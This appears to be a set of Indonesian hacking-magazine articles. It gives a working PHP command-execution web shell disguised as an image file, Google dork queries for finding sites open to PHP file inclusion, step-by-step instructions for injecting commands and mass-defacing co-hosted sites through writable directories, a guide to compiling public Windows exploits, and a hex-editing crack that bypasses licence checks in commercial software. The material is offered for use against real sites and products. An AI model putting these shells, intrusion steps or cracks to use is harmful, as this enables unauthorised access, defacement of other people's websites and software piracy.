penulis di sini bakal nulis bug yang udah lama. Bug ini penulis namain
bug “tusuk-tusuk” tapi mungkin semua pada bilang ini bug namanya
inject php bug ☺.

Sebelum kita memulai ngelakuin bug ini di target kita, ada baiknya
ente-ente semua mengcopy dan paste code berikut ini ke website
ente-ente sekalian, entah itu di geocities, portland, atau di hosting ente
terserah dah... sabodo tuing !!!
Oh iya, penulis lupa bilang ke ente semua, kalo ente semua udah tau
tentang ini bug ato udah ngerasa expert dengan dodolz-nya dunia
newbies, maka penulis saranin ente beralih ke tutorial ato artikel laen
aja, daripada habisin badwith ente pada :P~ hehehe...

Ini dia code yang musti ente copy-paste ke site ente semua ( note :
bagi ente-ente yang udah ada code ini di site ente, gak perlu lagi, ini
bagi yang belom ada aja ).

</center></center><br><font face="verdana" size="7"><center><b>CMD</b> - System


Command<br><br></center></font><font face="Verdana" size="1"></center><br>
<b>#</b> CMD PHP : <br>
<b>#</b> Re-DESIGN by : <b>m_beben from #kartubeben @ Dalnet</b><br>
<br>
<br>
<hr>
<br>
<pre><font face="Verdana" size="1">
<?
// CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
72
if (isset($chdir)) @chdir($chdir);
ob_start();
system("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
$output = ob_get_contents();

73
ob_end_clean();
if (!empty($output)) echo str_replace(">", "&gt;", str_replace("<", "&lt;",
$output));
?>
</font></pre>
<br>
<hr>
<br>
<font face="Verdana" size="1">
<b># m_beben from #kartubeben @ Dalnet</b><br>
<b># [Link] | [Link] | [Link]</b>
<br><b># Come and join with us on #kartubeben @ Dalnet</b>
</font>

Hmm... mungkin ada yang tanya, maksud penulis sebenarnya apa seh
dan gimana cara masukin code ini ke site kite-kita pada ??? Gini lho
maksud penulis : ( ini kita balik ke dasar lagi yah )

1. karena penulis rekomendasikan hosting geocities, maka sekarang


ente semua buka web geocities di [Link]
2. trus kalo ente udah ada account di sana ya silahkan login ke
sana, tapi kalo ente belom ada account, ada baiknya ente daftar
dulu untuk buat account hosting di sana
3. seep... kita udah buat satu account, dan contoh account kita kali
ini adalah
pukisek ( account ini fiktif, jadi kalo ada kesamaan nama ato
kesamaan peristiwa, yakinlah itu karena penulis udah kehabisan
idenya, wekekekeke... :P~
)
4. lalu kita login ke account pukisek kita itu di
[Link]
5. udah selesai login ke sana silahkan buka file manager ente di sana
trus buatlah new file lalu isikan dengan code kita tadi. Ato kalo ente
gak mau repot-repot, pertama-tama copy-paste code yang penulis
kasih tadi ke pc ente trus save dengan nama terserah ente dengan
ektensi .txt ato .jpg ( penulis di geocities gunain .jpg ☺ ) lalu silahkan
upload file yang udah ente save di pc ente ke hosting dengan account
pukisek yang udah kita buat tadi 6. di hosting, ente bisa save code kita
tadi dengan nama [Link] ato [Link]

Seep... sekarang code tadi udah kita simpan di hosting kita, jadi kita
bisa ngakses tuh code entar di
[Link]/pukisek/[Link]
ato [Link]/pukisek/[Link].

Nah, sekarang masalah berikutnya adalah mencari target ☺. Bicara


soal target adalah berbicara soal keberuntungan, wekekeke... penulis
aja kalo cari yang namanya target itu susah mati lho Cape
banget... nyebelelin, bikin kesel, dll... etc... soon... be er be...

74
Nah, sekarang untuk masalah targetnya, kita bisa cari di [Link] ☺
dengan keyword allinurl: “[Link]?*=*.htm*” ato allinurl:
“[Link]?*=*.php” bisa

75
juga allinurl: “[Link]?*=*.htm*” ato allinurl: “[Link]?*=*.php”
pokoke terserah entelah mo pake apa keywordnya ☺☺☺

Okeh, misalnya kita udah dapat target di


[Link]- [Link]/[Link]?page=[Link] nah,
ini target kita inject, caranya masukin code inject php
kita di target dengan cara [Link]-
[Link]/[Link]?page=[Link]
g?&c md=<di sini dimasukin perintah unix command> jadi, di tempat
unix command itu bisa masukin command unix apa aja, misalnya
perintah locate [Link] ato locate [Link] :P~ tapi penulis
lebih sering cari file [Link] daripade [Link] ato [Link],
soalnye penulis bukan CARDER !!!

Okeh, kita gak bahas tentang penulis ini seorang carder apa bukan,
yang penting ente semua bisa tentang masalah bug php ini, kalo
tetap gak bisa, ente semua bisa penulis Ge-bug, wekekeke ☺☺☺

Hm... tetapi inti sebenarnya yang mau penulis bahas adalah


bagaimana mendeface web dengan memanfaatkan perpaduan
antara bug php ini sendiri dan permisi dari file-file di target kita. Siapa
sangka jika seandainya target yang enta ato penulis dapetin gak bisa
untuk deface tetapi web yang berada satu hosting dengan target kita
ternyata bisa di deface ☺.

[Link] , [Link] yang ampe sekarang masih


dalam keadaan terdeface ternyata penulis deface dari target yang
memiliki bug php yang laen sedang target itu sendiri belom kedeface.
Makanya, jangan aneh kalo ada web yang penulis deface padahal
isinya hanya file-file statis, bukan dynamic file seperti .php ato .asp
namun tetap aja kedeface ☺☺☺

Bahkan kalo anda pernah melihat site [Link] (udah


mati) yang sempat beberapa kali kedeface ternyata di deface bukan
dari site itu langsung, tetapi melalui hostingnya dulu, yaitu
[Link]

Nah, makanya jangan keburu nyesel dulu kalo liat ada target kita yang
gak bisa dideface (dengan asumsi kita malas ngeroot di target
tersebut macam penulis
☺). Pertama-tama untuk melihat sebuah permisi file apakah
sebanding dengan
user id yang kita jalankan, maka gunakan command id lalu ls –la
namun jangan keburu sedih dulu kalo ternyata user yang kita pake
adalah nobody dan user yang nulis file di target adalah bebenkeren
misalnya.

76
Hmm... lalu kita perhatikan permisi file di target kita, apakah ada yang
bisa kita tulisi ? Biasanya karena kita nobody, file yang bisa ditulisi
nobody adalah file yang allow write permission di bagian othernya
(penulis sulit menjelaskannya, jadi sorry aja yah ☺)

77
$ls –l
total 1023
drwxrwxrwx 100 bebenkeren kartubeben 43203 kartubeben
drwx---rw- 3 bebenkeren kartubeben 1234 deface
drwxr-xr-x 11 bebenkeren kartubeben 23421 hosting
drwx------ 1000 bebenkeren kartubeben 12345 secret
-rwxr-xr-x 1 bebenkeren kartubeben 1234 [Link]
-rwxrwxrwx 1 bebenkeren kartubeben 2332 [Link]

Jika kita perhatikan contoh hasil command ls -l di atas, maka user yang
menulis di target adalah bebenkeren dengan group kartubeben
sedangkan id yang kita jalankan adalah nobody, maka file yang dapat
kita tulisi ato kita deface adalah folder kartubeben dan deface karena
kedua file tersebut memiliki permisi yang dapat ditulisi oleh other. Jadi
misalnya nama domain target kita adalah [Link] maka
kita bisa mempublikasikan hasil deface kita di
[Link]/kartubeben ato di [Link]/deface.
Trus gimana kalo target kita ketika kita cek ternyata hasilnya
adalah seperti
berikut
:

$ls –l
total 1023
drwxr-xr-x 555 root root 50000 .
drwxrwxrwx 100 apache apache 40000 ..
drwxrwxr-x 100 bebenkeren kartubeben 43203 kartubeben
drwx---r-- 3 bebenkeren kartubeben 1234 deface
drwxr-xr-x 11 bebenkeren kartubeben 23421 hosting
drwx------ 1000 bebenkeren kartubeben 12345 secret
-rwxr-xr-x 1 bebenkeren kartubeben 1234 [Link]
-rwxrwxrwx 1 bebenkeren kartubeben 2332 [Link]
$pwd
/home/kartubeben/

Hmm... jika kita melihat sepintas maka tak ada file yang bisa kita tulisi
sehingga kita tidak dapat mendeface target tersebut, tetapi tunggu
dulu !!!. Coba kita perhatikan dengan seksama ternyata
directory .. ato directory
sebelumnya/dibelakangnya ternyata memiliki permisi yang dapat
ditulisi oleh account nobody sebagai other, dan wow !!! jika kita
mendapati target yang demikian kita bisa melalukan mass defacing !!!
wekekeke... ☺☺☺

Penulis kagak mau berlama-lama dalam menulis tutorial kali ini, jadi
hanya sampai di sini penulis share ilmu penulis ke ente semua
para newbies. So, tinggal perpikir selangkah lagi untuk dapat
melakukan deface ☺ tetapi kalo mau seh, simpelnya anda tinggal
upload bindtty ke target trus pasang ribuan ato kalo sanggup jutaan
exploit ke site target, kemudian dapatin root tuh target lalu maenkan
tuh target, tetapi umumnya kalo ente udah dapat root mending jangan

78
deface lagi ☺☺☺

Penulis : M_Beben

79
Greatz : #kartubeben crew @ [Link]
- K-159 and all of #aikmel crew and staff
- the_day, y3dips and all of #e-c-h-o crew and staff
- kevin yang udah banyak membantu penulis
- Nixell yang udah berbaik hati kenada penulis
- Sam_stradlin , PARMIN , CupiD^ , pakcik dan semua yang udah
bantu-bantu di #kartubeben
- Special : bang yudhax yang udah mengajari penulis tentang permisi
file di
- Target yang selama ini belom penulis perhatikan, kapan #postgres
dibuka lagi
bang ???

80
Compilasi dengan LCC dan
permasalahannya

Sebenarnya penulis pernah posting tentang hal ini diforum dibeberapa


bulan yang lalu, tapi karena request seseorang tentang permasalahan
kompilasi di LCC maka penulispun membuatnya untuk X-Code
Magazine No 3 ini.

Compiler adalah software yang mengubah source code menjadi objek


program, LCC Compiler termasuk C Compiler berbasis Windows,
biasanya digunakan untuk compile source exploit menjadi file
executable agar bisa dijalankan tanpa compiler, untuk
mendownload LCC dapat klik
[Link] e.

Pertama-tama masuk ke program LCC lalu file pilih open, misal disini
Kaht sebagai contohnya yang didapat dari d:\folder lama :

setelah terbuka tekan F9 atau pilih Compiler lalui pilih make, jika
berhasil akan tampil pesan seperti dibawah ini.

Wedit output window build: Tue Aug 1 03:59:03 2006


[Link] built successfully. (1.3 sec).

Setelah itu kita lihat hasilnya di C:\folder lama\


LCC

81
Setelah itu kita coba lagi kompilasi exploit lainnya, dan pasti
terjadi permasalahan yaitu exploit berikutnya tidak bisa
dicompile walaupun sudah diclose source sebelumnya, untuk
solusinya, pada program LCC perhatikan menu project lalu lalu pilih
Configuration, lalu perhatikan pada output “Project table file path”,
hapuslah file [Link] yang ada di folder tersebut.

82
Setelah file ini dihapus maka otomatis LCC kembali seperti semula
dan anda bisa mengcompile exploit lainnya lagi, mengapa bisa
demikian ? ini disebabkan project masih terset di file [Link]
dengan isi

[Projects]
Kaht=D:\Folder lama\[Link]

Setelah direset default projectnya dengan menghapus [Link] di C:\


LCC\Lib maka kita bisa mencoba mengcompile exploit seperti
Exploit “Microsoft Windows Plug-and-Play Service Remote
Overflow” dan lainnya yang dapat anda cari di [Link].

Sebagai tambahan tidak semua exploit bisa dicompile under


Windows atau di
Linux, yang penting perhatikan pada Header
File :

#include <windows.h> >> Kompile di Windows


#include <stdio.h>

ata
u

#include <sys/types.h> >> kompile di Linux


#include <netinet/in.h>
#include <netdb.h>
#include <sys/socket.h>

kalau masih ada syntax yang error lmaka lebih baik kita perhatikan
sourcenya sekali lagi, kita perbaiki yang error baru di compile lagi.
Karena yg membuat exploit tidak jalan karena kadang-kadang

83
pembuat exploit menggunakan compiler C/C++ yg versinya ataupun
jenisnya berbeda dengan C Compiler yang kita punya, selain itu
biasa kadang di source di berikan informasi dengan

84
compiler apa kita menginstall seperti di “Microsoft Windows Plug-and-
Play Service Remote Overflow” ditampilkan bahwa kita dapat
mengcompilenya dengan :

- Win32/VC++ : cl -o HOD-ms05039-pnp-expl HOD-ms05039-pnp-expl.c


- Win32/cygwin: gcc -o HOD-ms05039-pnp-expl HOD-ms05039-pnp-expl.c
- Linux : gcc -o HOD-ms05039-pnp-expl HOD-ms05039-pnp-expl.c

Dan kebetulan exploit ini bisa juga di compile dengan LCC, selain VC+
+ dan cygwin, sehingga exploit ini dapat dicompile di beberapa C
Compiler di Windows.

Penulis :

Kurniawan / ^family_code^
Referensi :
- Postingan PusHm0v di Forum
Yogyafree

85
Mencari Alamat Target In One
Hosting

Assalamu’alaikum all, pa khabar


nih ???
Penulis doain ente semua tetap berada dalam lindungan Allah SWT
yang telah
memberikan kite hidayah sehingga kite semua dapat berkumpul
bersama-sama di tempat yang sederhana ini, tidak lupa pula
sha... ups, kok jadi macam ceramah ya ??? Wekekeke... ya sudah lah
☺☺☺ :P~

OK, sekarang kite serius ya, ingat... jangan ada lagi yang maen-maen
apalagi becanda. Se... Ri... Us... !!! ... OK !!!

Oh iya, sebelum penulis memulai tulisan ini, maka ada baiknya ente
memperhatikan peringatan penulis berikut ini :

TULISAN INI HANYALAH DI PERUNTUKKAN UNTUK PARA NEWBIES, JADI


KALO ENTE MERASA UDAH EXPERT, MERASA UDAH PINTER, KALO
MERASA... AH POKOKE KALO ENTE ITU UDAH HEBAT, MAKA
DILARANG DAN SANGAT TERLARANG MEMBACA TULISAN INI DEMI
KEBAIKAN ENTE SENDIRI. PENULIS TIDAK MENJAMIN JIKA ENTE KELAK
BAKAL MATI KEBOSANAN KARENA MEMBACA TULISAN INI.
TERIMA KASIH.
TTD
ORANG KEREN

Hmm... bila ente semua udah pada baca artikel penulis


sebelumnya tentang “php-bugs dan permisi file” sehingga dapat
mendeface dalam satu hosting walau target yang aslinya gak sempet
kita deface. Nah, mungkin timbul pertanyaan dibenak ente pada...
Gimana seh caranya kita tahu and liat nama situs target yang kita
deface dalam satu hosting itu.
Hmmmm....................... ngerti enggak
(-_-) ???
Gini loh, misalnya kita mendapatkan target [Link] trus kita
dapatin id yang kita jalankan di target adalah nobody (ini enggak
mutlak lho, bisa aja id user yang kita jalankan adalah apache ato www-
data pokoke prinsipnya kite memiliki hak menulis di target). Nah
setelah kite cek dan ricek, eh...... kita bisa melakukan mass defacing di
sana :P~ (slurpp......) (ini kalo memang permisi file di target
memungkinkan kita untuk melakukan mass defacing tapi kale ente gak
bisa ngelakuin mass defacing di target ente, gak ada salahnya buat
baca terus ini artikel, sapa tau di sana ente dapatin web jualan
misalnya, walo gak bisa deface, paling enggak bisa lah sekedar liat-liat
suasana, wakakaka...... ☺☺☺)

Hehehe...... kembali ke pokok masalah, langkah selanjutnya adalah


melihat directori aktif kita saat ini. Bukan apa-apa, tujuan sebenarnya
dari tindakan ini adalah untuk melihat dimana kita berpijak saat ini,
soalnya kebanyakan (bahkan hampir semua target) nyatuin semua
directory web dalam satu directory untuk memudahkan administrasi.

$pwd
/home/recompil/public_html

Lalu kita melihat di sana bahwa directory aktif saat ini


adalah
/home/recompil/public_html. Jika kita melihat directory aktif target
tersebut,
maka kita berasumsi bahwa admin menyatukan semua directory web
usernya ada di bagian /home.

Lho, kok di bagian /home seeh ??? Bukannya di


/home/recompil ??? OK... kita simpan dulu pertanyaan tersebut.
Entar kita membahasnya OK.
Lalu langkah kedua adalah melihat daftar user-user web yang berada
di bagian directory /home dengan menggunakan command ls –la.

$ls –la /home


total 4620
drwxr-xr-x 273 root root 8192 Aug 4 13:00 .
drwxr-xr-x 16 root root 4096 Nov 30 2003 ..
drwx--x--x 7 abbeydis abbeydis 4096 Jun 22 07:39 abbeydis
drwxrwxrwx 7 acebroth acebroth 4096 Jun 22 02:28 acebroth
drwxrwxrwx 7 rattanwa rattanwa 4096 Jun 22 05:24 rattanwa
drwx--x--x 7 raygiubi raygiubi 4096 Jun 22 02:28 raygiubi
drwx--x--x 14 recompil recompil 4096 Jun 22 07:09 recompil

Nah, itu adalah hasil dari command ls –la di directory /home trus
langkah selanjutnya adalah menentukan name site target yang bakal
kite deface dalam 1 hosting dengan target asli kite ☺☺☺ Oh iya, tadi
ada yang tanya khan kenape directory web usernya adadi
bagian /home dan bukan di bagian
/home/recompil. Nah, sebenarnya di bagian /home/recompil ada
folder
/public_html, file itu memang bawaan yang menjadi ciri khas apache,
jadi sebenarnya letak web user itu ada di /home bukannya di
/home/recompile.
Hmm... belom ngerti juga ya apa yang dimaksud penulis memang
penulis gak bisa begitu jelas menjelaskan yang penulis maksud,
berbelit-belit khan OK...... next, kita gak perlu berhenti di sini. Langkah
selanjutnya adalah melihat dimana letak [Link] target kita. Guna
[Link] adalah sebagai configurasi apache dalam mengatur server.
Lalu tujuan kita mencari [Link] itu adalah untuk melihat vhost
name server target kita (sebenarnya dari sana langsung bisa juga seh
tanpa perlu gunain command pwd ama ls –la segala ☺, tapi kayaknya
gak menarik, soalnya entar tulisan ini gak penuh, wekekeke ☺☺☺).

Ada beberapa cara dalam mencari [Link] target. Salah


satunya adalah :

$locate [Link]

/etc/httpd/conf/[Link]
/etc/httpd/conf/[Link]
/etc/httpd/conf/[Link]
/etc/httpd/conf/[Link]

Jika kita melihat fila hasil output dari command locate, maka jangan
dulu bingung file mana yang harus dilihat. Kita ambil file [Link]
tanpa embel- embel segala sebagi patokan, jadi bukan [Link]
ato [Link]. Ingat [Link] tanpa embel-embel yah.

Trus, kita liat deh tuh [Link] dengan perintah cat,


caranya

$cat /etc/httpd/conf/[Link]
..........
<VirtualHost [Link]> ServerAlias [Link]
[Link]
ServerAdmin webmaster@[Link]
DocumentRoot /home/abbeydis/public_html
BytesLog dmlogs/abbeydistribution.c
oom-bytes_log ServerName [Link]
User abbeydis
Group abbeydis
CustomLog domlogs/[Link] combined
ScriptAlias /cgi-bin/ /home/abbeydis/public_html/cgi-bin/
</VirtualHost>
..........

Sebenarnya tampilan file [Link] bukan seperti yang ente lihat itu,
itu hanya sekedar contoh pada bagian vhost user
abbeydis yang memiliki site
[Link] yang meletakkan file-file webnya di
directory
/home/abbeydis/
public_html.
Seep, gimana... udah ngerti khan apa yang penulis
maksudkan ☺☺☺
Kalo belom juga ngerti ya wees, cari diri perngertian sendiri,
wekekeke...
memang penulis terkadang suka banget
ngambek ya :P~
Namun, nah ini namun yah... terkadang di beberapa target,
command locate
malah gak mau jalan, entah itu dikatain bahwa command locate gak
ada dalam daftar command-command yang bisa mereka handle-lah
ato... pokoke yang jelas mereka ngatain bahwa yang namanya locate
itu gak ada, udah digusur kali ama adminnya :P~

Nah, gimana neh kalo seandainya itu yang


terjadi ???
Pengalaman penulis sendiri seeh penulis gunain command
whereis dengan
argumen ke httpd sebagai binnary-nya ato file executenya apache. Jadi
command yang penulis jalankan adalah whereis httpd kemudian
setelah dapat hasilnya penulis lakukan command cat /<hasil dari
command whereis httpd> ditambah dengan /conf/[Link]. jadi
intinya begini loh :
$whereis httpd
/etc/httpd/httpd

$cat /ect/httpd/conf/[Link]
..........
<VirtualHost [Link]> ServerAlias [Link]
[Link]
ServerAdmin webmaster@[Link]
DocumentRoot /home/abbeydis/public_html
BytesLog domlogs/[Link]-bytes_log
ServerName [Link]
User abbeydis
Group abbeydis
CustomLog domlogs/[Link] combined
ScriptAlias /cgi-bin/ /home/abbeydis/public_html/cgi-bin/
</VirtualHost>
..........

Nah, mungkin ada beberapa teknik lain yang belom penulis kuasai,
seperti melihatnya melalui file-file configurasi DNS di target
misalnya :P~ tetapi menurut penulis ini sudahlah cukup. Selamat
berkarya terus para newbies...... eh penulisboleh ngiklan dikit gak
??? kalo boleh, penulis mo ngiklanin
#kartubeben
neh :
gabung-gabung donk ke komunitas kita di channel #kartubeben di
server dalnet
:P~
wekekekeke......
OK, See you next
time !!!
Greatz : #kartubeben crew @
[Link]
K-159 and all of #aikmel crew and
staff
the_day, y3dips and all of #e-c-h-o crew
and staff
kevin yang udah banyak membantu
penulis
Nixell yang udah berbaik hati kenapa
penulis
sam_stradlin , pArMin , CupiD^ , pakcik dan semua yang udah bantu-
bantu di
#kartubeb
en
Special : bang mus di Mina Net yang udah ngajarin penulis
tentang cara
membuat router dan konsep dns di dunia internet walo sekarang
penulis udah lupa lagi.
Teknik Mudah Cracking 4 Software Terbaru
Dachshund Software Jerman
Written By : NeMeSiS_ByTe (on 01-08-06, 11.00pm)

Untuk mengatasi kejenuhan artikel defacing (thanx before atas


kreatifitas teman-teman semua yang mau berbagi ilmu), maka iseng-
iseng Saya menulis artikel cracking (itung-itung sambil
menunggu posting bug terbaru di
securityfocus, he3x!) Pada kesempatan kali ini Saya akan menjelaskan
tentang bagaimana cara meng-crack sebuah software. Baiklah,
software yang akan diuji coba merupakan keluaran terbaru dari vendor
Dachshund Software Jerman, silakan Anda download
semua software-nya di
[Link] produk
yang dikeluarkan lumayan keren, seperti AntiCrash v3.6.1
(untuk mengatasi program crash), Hare v1.5.1 (untuk memacu
performance PC sampai 300%) , Zoom v1.3.1 (untuk mengakselerasi
startup, reboot, shutdown dan standby), dan Battery Doubler v1.2.1
(untuk melipatgandakan autonomy baterai laptop). Harga masing-
masing software sekitar $29 untuk standar dan $39 untuk pro umpama
kalau kurs rupiah per $1=Rp.10ribu, bisa ditebak harganya
berapa! Apalagi kalau beli 4 software sekaligus bisa 1juta lebih, man!
(jumlah yang tidak sedikit bagi anak kost terutama bagi hacker
wannabe alias pengangguran seperti Saya, hiks3x! / )

Sebelum mulai alangkah baiknya untuk memahami dahulu proteksi


software yang dipakai oleh vendor :
• Nag Screen (untuk masukkin serial dan nama)
• Tiap Shitware Trial limit cuma untuk 20 kali pemakaian, pelit
banget! /
• Pengecekan serial via koneksi NET, mirip proteksi Flex. Jadi gak
mungkin untuk register software pakai FAKE serial dari situs
crack astalavista, freeserial, dll yang ada kalau Anda tetap nekat
gak mungkin bisa ke- register, karena itu cuma tipuan para
cracker iseng aja yang pengen terkenal tanpa belas kasihan!
• Kelemahan proteksi yaitu weak enkripsi, bad CRC check so
bikin Saya lebih bebas berkreatifitas tanpa perlu pusing dan
debugging.

Semua yang perlu dipersiapkan untuk mulai langkah cracking


program adalah :
• Sofware keluaran Dachshund Software. Tanpa itu apa yang mau
di crack, woy?! Kalo gak ada softwarenya lebih baik Anda crack
aja Celana Dalam cewek Anda. Siapa tau aja gambarnya
Spiderman, keren buat poster loh
☺.
• Hexa Editor, merk-nya terserah yang penting bisa dipakai.
Sekedar referensi Saya pakai Hex Workshop Editor v2.20b005
32bit keluaran BreakPoint Sofware
download di
[Link]
selain tampilannya bagus, pemakaiannya
lumayan mudah so biar sama pakai aja program ini.

• Pengetahuan tentang binary dan hexa..meski Anda cuma sedikit


tahu gak masalah coz cukup mudah koq (memang cracking
selalu terikat dengan binary, hexa, assembly, dll tetapi artikel
ini sengaja dipermudah agar dapat dipahami oleh berbagai
kalangan, NeMeSiS_ByTe baik hati khan?he3x!)

• Oya, jangan lupa Red Ardath, Teh manis, dan Foto keren
NeMeSiS_ByTe yang imut banget..oi, oi☺! Itu hal yang wajib
dipatuhi saat cracking loh..

Langkah crackingnya :
• Saya sengaja menghindari penggunaan SoftIce ataupun
debugger lain (meskipun Saya sendiri suka pakai itu) agar
gak bikin pusing para pemula, lagian tampilan GUI Under DOS
juga jelek tuh ☺. Saya tidak menerapkan breakpoint memori,
Saya hanya akan menggunakan logika aja. Maaf, Saya gak
bermaksud sok pintar ataupun sok 311t3 karena jika ada cara
yang lebih mudah kenapa harus pilih cara yang sulit, bro!?

• Seperti biasa Anda install dulu program yang mau di crack, di


sini Saya akan mengambil AntiCrash sebagai sampel. Setelah
terinstall, program akan running otomatis. Anda tekan “Continue
Trial” aja, lalu “Ok”. Program tadi akan otomatis berada di sistem
tray, so Anda buka main menu program tersebut pilih AntiCrash
klik “Show Main Menu” cukup lihat-lihat aja menu about yang
tertera tulisan “Unregistered!” kalau udah puas Anda “Quit”
program tersebut. Hal ini dilakukan untuk memastikan semua
data yang dibutuhkan untuk proses cracking tertulis dengan
lengkap pada database program.

• Next, coba Anda masuk ke direktori installasi program


AntiCrash di C:\Program Files\Dachshund Software\AntiCrash.
Oke, udah ketemu belum? Kalau sudah, sekarang buka celana
Anda eitz, sori salah ☺! buka Hexa Editor-nya pilih open trus pilih
[Link]. Jangan kaget kalau disitu banyak karakter aneh,
hampir seluruhnya gak bisa dibaca mirip tulisan ayam lagi belajar
nulis. Buat teman-teman 311t3 cracker pasti dah bisa baca dan
paham semua itu but, buat pemula jangan pusing dulu karena
disitu ada 2 kolom keren sebelah kiri untuk hexa dan kanan
untuk binary (dec). Next, di Hexa Editor pada menu “Edit” pilih
“Find” pada
kolom value Anda check ASCII, kolom direction Anda check
down, kolom case Anda check ignore. Pada kolom find what
ketikkan keyword [Link]. Nah ketemu khan?! Itulah target
yang bikin program ini ngeselin dan harus bayar (gambar 1)

Gambar 1. Posisi [Link] pada program body


[Link].

• Maksud dari [Link] adalah semua proses yang


berhubungan untuk proteksi diolah disini, dari ekstensinya
aja sudah bisa diketahui khan? Next, cari dimana
letak [Link] berada, karena file ini di-hidden maka
ada baiknya Anda rubah setting hidden windows Anda melalui
folder Option-nya Windows. Letak [Link] yang di-hidden
berada di C:\Windows, Anda bisa pakai search untuk mencarinya.
Trus, Anda pasti bertanyadarimana Saya tahu semua
proses kumpul kebo☺ di [Link]?! Simple
aja, pakai logika Anda..buka dengan Hexa Editor file
[Link] tersebut maka Anda akan menjumpai beberapa
petunjuk seperti pada gambar di bawah ini

Gambar 2. Isi
[Link]
Untuk memudahkan dan penyederhanaan ruang lingkup
cracking cukup amati aja apa yang bisa terbaca oleh mata,
agar Anda tidak pusing dulu
(setidaknya itu modal dasar buat pemula). Jika Anda amati ada
kata nologging (ehm, tau khan artinya?), o|on, h{s, 2, dan
myname karakter yang lainnya anggap aja aksesoris..wah,
ternyata enkripsi program ini bego juga yach meski
kinerjanya lumayan cool.. itulah sebagian dosa besar pembuat
compiler VB! Dari sini jika pemahaman binary anda lumayan or
maut pasti cukup smile aja dan gak nerusin baca artikel ini
karena kata dokter bisa mengurangi kecerdasan cracking
para master
311t3 sampai 99% (ehm, efek samping-nya ternyata lebih besar
dari obat diare, he3x!) I am not an 311t3, and I do not want to be
an 311t3, coz NeMeSiS_ByTe merasa gak pantes aja-lah..

• Dari data yang telah didapat maka dapat diambil logika


sederhana, tanpa login dengan benar maka register tidak
on so program akan mulai menghitung jumlah pemakaian
sebanyak h{s 2, pencocokan register akan diulang sekali
lagi pada myname untuk memastikan program sudah
dibeli or belum. Dari sini Anda sudah mengerti khan?! ☺.

• Oke, hal pertama yang perlu dilakukan adalah menghapus


beberapa baris hexa yang fungsinya hanya sebagai aksesoris
(gak usah takut coz CRC- nya bego dan bukan *.exe), agar lebih
mudah Anda pahami maka contoh penghapusan dengan karakter
ASCII aja. Caranya cukup blok bit yang akan dihapus kemudian
tekan DEL. Agar lebih jelas bit mana saja yang harus dihapus
Anda bisa melihat gambar yang telah disertakan (catatan : bit
yang berada di dalam lingkaran aneh berwarna merah wajib
dihapus!).

Gambar 3. Penghapusan bit.


Gambar 4. Tampilan setelah bit dihapus

• Next, saatnya kerja..masih didalam Hexa Editor. Tambahkan


ruang hexa untuk myname caranya letakkan kursor pada posisi
tanda titik terakhir setelah karakter myname, kemudian klik
kanan pilih insert pada number of byte ketik 12 lalu check tanda
decimal. Setelah itu pasti akan terbentuk
12bit baru dengan nilai masih perawan, eitz, salah lagi ☺ masih
kosong! Next, sekarang isi kekosongan nilai tersebut mulai dari
bit baru pertama contohnya dengan nama NeMeSiS_ByTe
dengan hexa 4E 65 4D 65 53 69
53 5F 42 79 54 65. kalo udah, sekarang rubah nilai hexa
myname.. 6D 79
6E 61 6D 65 00 00 menjadi 6D 79 6E 61 6D 65 00 0C. Hal ini
bertujuan agar nama yang diregister menjadi valid dan tertulis
dengan benar meskipun formatnya panjang dan pakai karakter
unik seperti nickname Saya.
Loh gitu aja sudah selesai?!! BELUM! Program masih nge-
check Trial pakai nag screen, karena itu nonaktifkan kondisi itu.
Masih ingat sama o|on ? itulah target selanjutnya. Setelah
bagian akhir o|on.. (ASCII mirip titik-titik) Anda akan menjumpai
nilai hexa 00 05. Masih bingung? Cobalah ganti angka 00 05
menjadi 01 05. Itulah tiket masuk program agar pengecekan
myname menjadi valid serta membuat nag screen wassalam bin
gut nite! Oya, agar program seakan-akan baru dijalankan
pertama kali (dianggap perawan gitu ☺) cobalah rubah angka 2
menjadi 0, kode hexa untuk 0 adalah 30. Letaknya di h{s..2
Sekarang jadi keren khan?! (maksud h{s tidak lain adalah
mengarah pada penunjukkan waktu habis pakai program).
Untuk lebih jelasnya coba koreksi hasil crack Anda dengan
gambar 5.
Gambar 5. Tampilan File [Link] setelah “dibenerin”
dengan bijak

• Proses cracking selesai, sekarang simpan file [Link]


yang telah diedit tersebut kemudian copy dan paste-kan
overwrite ke C:\Windows. Sekarang jalankan AntiCrash-nya..crut!
tidak ada nag screen lagi bukan, masih belum yakin amati di
about box. Tertera NeMeSiS_ByTe bukan lagi unregister! Bravo
deh coz kini bisa punya software tanpa harus korupsi..

Untuk program Dachshund Software yang lain penerapan tekniknya


sama, cuma nama file *.dat-nya aja yang berbeda so Saya gak mau
artikel ini terlalu panjang dengan jelasin satu persatu /. Sebagai
referensi akan Saya beri petunjuk nama file *.dat-nya untuk AntiCrash
v3.6.1 [Link], Hare v1.5.1 [Link], Zoom v1.3.1
[Link], Battery Doubler v1.2.1 [Link]. Berita gembiranya
Anda cukup me-rename aja file [Link] yang telah di-crack
tersebut diatas menjadi file *.dat untuk program Dachshund Software
yang lain, trik Saya keren khan?! Cuma dengan modal sekali crack..4
software langsung jebol! Oke deh, Saya rasa cukup segini dulu
aja..InsyaAllah lain kali kalau ada hal baru akan Saya posting lagi.
Untuk teman-teman yang senantiasa berbagi ilmu, God Bless Us! Love,
Peace, Emphaty regards from NeMeSiS_ByTe...

About
NeMeSiS_ByTe :
Maaf Saya hanya alumnus fakultas peternakan di Malang,
bukan dari
jurusan yang mempelajari Ilmu Komputer yang seperti teman-teman
duga /, meski beda tapi visi kita sama itu yang bikin hidup lebih
indah.. untuk persaudaraan dan persahabatan kunjungi link
NeMeSiS_ByTe I’m really glad punya banyak teman ☺. Kalau Anda perlu
crack FULL WORKING or Google Hacker ada juga loh. Saya usahakan
selalu terupdate, kalo ada duit ☺.
You can touch me at :
[Link]
You can scream at Me to :
nemesisbyte@[Link]

IMPORTANT!!! NeMeSiS_ByTe do not support piracy, all


NeMeSiS_ByTe crack release just for evaluation only. If you
want to use the program for a long time. Please consider to
BUY IT!! Sometimes your money can save the author’s life.
NeMeSiS_ByTe thanx
to :
Allah S.W.T dan Nabi S.A.W atas ilmu dan dosa yang kumiliki
selama ini
(terimalah sujud-ku ampuni khilaf-ku, amin), my MoM ‘n dAd yang
selalu pengertian ‘n pray for me, bRo ‘n SyS yang selalu ngedukung
Aku, My Sweetiest EKY tetaplah menjadi bintang di langit (R.I.P 12
Januari 2006), Cradle Of Filth, GreenDay, Komik Doraemon, Band
